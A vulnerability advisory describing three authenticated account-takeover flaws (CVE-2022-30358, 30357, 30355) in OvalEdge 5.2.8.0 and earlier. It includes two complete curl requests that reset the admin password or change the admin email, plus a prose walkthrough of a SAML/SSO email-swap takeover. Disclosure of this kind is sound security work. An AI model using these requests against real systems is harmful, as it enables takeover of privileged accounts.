Page cover

‼️Account Takeover

OvalEdge 5.2.8.0 and earlier is affected by multiple account takeover vulnerabilities.

Account Takeover - Change local privileged user password (authenticated)

CVE-2022-30358

OvalEdge 5.2.8.0 and earlier is affected by an Account Takeover vulnerability via a POST request to /user/updatePassword via the userId and newPsw parameters . Authentication is required.

Example CURL Request

curl -k 'http://example.com:8080/ovaledge/user/updatePassword' \ -H 'Accept: */*' \ -H 'Accept-Language: en-US,en;q=0.9' \ -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \ -H 'Cookie: oe-loc=en; JSESSIONID=NDQ3MzgxM2YtYTFlYS00OTUyLWE0MmItNDYzMmIwZDVhOWUx' \ -H 'Origin: http://example.com:8080' \ -H 'Proxy-Connection: keep-alive' \ -H 'Referer: http://example.com:8080/ovaledge/' \ -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36' \ -H 'X-Requested-With: XMLHttpRequest' \ --data-raw $'userId=admin&newPsw=NewPassword123&adminServce=false&user' \ --compressed \ --insecure

Account Takeover - Change local privileged user email address (authenticated)

CVE-2022-30357

OvalEdge 5.2.8.0 and earlier is affected by an Account Takeover vulnerability via a POST request to /profile/updateProfile via the userId and email parameters . Authentication is required.

Once the privileged users email address is updated to an email account the attacker controls, the attacker uses the forgot password feature to reset the victim account password. SMTP must be configured properly for the password reset email to be sent.

Example CURL Request

curl -k 'http://example.com:8080/ovaledge/profile/updateProfile' \ -H 'Accept: */*' \ -H 'Accept-Language: en-US,en;q=0.9' \ -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx632L1l5AnBf76MC' \ -H 'Cookie: oe-loc=en; JSESSIONID=OGU2OWIxYTgtYTA4Yi00M2QyLTg5YmItMjY4ODczOWNjYWNl' \ -H 'Origin: http://example.com:8080' \ -H 'Proxy-Connection: keep-alive' \ -H 'Referer: http://example.com:8080/ovaledge/' \ -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36' \ -H 'X-Requested-With: XMLHttpRequest' \ --data-raw $'------WebKitFormBoundaryx632L1l5AnBf76MC\r\nContent-Disposition: form-data; name="fname"\r\n\r\nAdmin\r\n------WebKitFormBoundaryx632L1l5AnBf76MC\r\nContent-Disposition: form-data; name="lname"\r\n\r\nOvalEdge\r\n------WebKitFormBoundaryx632L1l5AnBf76MC\r\nContent-Disposition: form-data; name="email"\r\n\r\n[email protected]\r\n------WebKitFormBoundaryx632L1l5AnBf76MC\r\nContent-Disposition: form-data; name="userid"\r\n\r\nadmin\r\n------WebKitFormBoundaryx632L1l5AnBf76MC\r\nContent-Disposition: form-data; name="phone"\r\n\r\n\r\n------WebKitFormBoundaryx632L1l5AnBf76MC\r\nContent-Disposition: form-data; name="slackid"\r\n\r\n\r\n------WebKitFormBoundaryx632L1l5AnBf76MC\r\nContent-Disposition: form-data; name="picture"; filename=""\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryx632L1l5AnBf76MC\r\nContent-Disposition: form-data; name="stackId"\r\n\r\n\r\n------WebKitFormBoundaryx632L1l5AnBf76MC\r\nContent-Disposition: form-data; name="userId"\r\n\r\nadmin\r\n------WebKitFormBoundaryx632L1l5AnBf76MC--\r\n' \ --compressed \ --insecure

Account Takeover - Change SAML/SSO privileged user email address (authenticated)

CVE-2022-30355

OvalEdge 5.2.8.0 and earlier is affected by an Account Takeover vulnerability via a POST request to /profile/updateProfile via the userId and email parameters . Authentication is required.

In this scenario, the attacker updates their own email address to an off-premise attacker controlled email address. Next, they update the privileged user email address to their own SAML/SSO organizational email address. Logout. Re-Authenticate via SAML/SSO. Attacker has now taken over the privileged user account.

Last updated